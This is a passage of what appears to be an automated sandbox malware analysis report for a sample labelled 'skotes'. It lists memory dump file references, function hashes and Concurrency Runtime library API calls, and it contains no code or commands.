                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                                                                                                                                                                • String ID: pExecutionResource
                                                                                                                                                                • API String ID: 1772865662-359481074
                                                                                                                                                                • Opcode ID: 3433304f9d79f4d74544b950b72b631d991790da178760ade243601f5f063166
                                                                                                                                                                • Instruction ID: ed23af3070cd932258eb8bc56c0359abfdaf777aed4a48d3915554de6af2ddc1
                                                                                                                                                                • Opcode Fuzzy Hash: 3433304f9d79f4d74544b950b72b631d991790da178760ade243601f5f063166
                                                                                                                                                                • Instruction Fuzzy Hash: 852176756413059BCF08EF54C892BADB7E5BF48310F1440A9E505AB392DBB4AE05CBA5
                                                                                                                                                                APIs
                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BA4F24
                                                                                                                                                                • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00BA4F66
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
                                                                                                                                                                • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                • API String ID: 2663199487-3650809737
                                                                                                                                                                • Opcode ID: ecd8901f4d9b8cdaaa5a9eb32f260244a50e2a70071b40170bb5d610fe687657
                                                                                                                                                                • Instruction ID: 1758d3487a8d2e3158b12ac3735b824bf9e73e6038f300a9e1388c49e18892ce
                                                                                                                                                                • Opcode Fuzzy Hash: ecd8901f4d9b8cdaaa5a9eb32f260244a50e2a70071b40170bb5d610fe687657
                                                                                                                                                                • Instruction Fuzzy Hash: 42218335604615EFCF18EF98C892EADB7F5FF89310F1040AAE50697691DBB1AE01CB51
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00BABA0E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                                                                                • API String ID: 348560076-3997890769
                                                                                                                                                                • Opcode ID: e65adf7cb87e9a71c71215faee9c49f31250a80e019527a8ca0da90b27eb9c27
                                                                                                                                                                • Instruction ID: 3ccb9aecf3bb0de57476d27216d61b876a10c314aa39c3431aaea9340c31ba53
                                                                                                                                                                • Opcode Fuzzy Hash: e65adf7cb87e9a71c71215faee9c49f31250a80e019527a8ca0da90b27eb9c27
                                                                                                                                                                • Instruction Fuzzy Hash: 5701F57158A3556EEB20BBB59C41FAB31DCDF0330CF2018BAE551EB192FF65E40086A1
                                                                                                                                                                APIs
                                                                                                                                                                • SafeRWList.LIBCONCRT ref: 00BA6E73
                                                                                                                                                                  • Part of subcall function 00BA4E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00BA4E7F
                                                                                                                                                                  • Part of subcall function 00BA4E6E: List.LIBCMT ref: 00BA4E89
                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BA6E85
                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00BA6EAA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                • String ID: eventObject
                                                                                                                                                                • API String ID: 1288476792-1680012138
                                                                                                                                                                • Opcode ID: 6ea733552a46df48f2b9306be8874cf1143074811da76f61a80b68969a597700
                                                                                                                                                                • Instruction ID: 22c2b097521bab7232f7a370686049bcc34ac0f085d48f53930d4181be670990
                                                                                                                                                                • Opcode Fuzzy Hash: 6ea733552a46df48f2b9306be8874cf1143074811da76f61a80b68969a597700
                                                                                                                                                                • Instruction Fuzzy Hash: 6D11E1B5544204EBDB28FBA4CC86FEEB7E89F01744F2041A6B515B61D1EB70AE04C6A5
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 00BAA102
                                                                                                                                                                • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00BAA126
                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BAA139
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
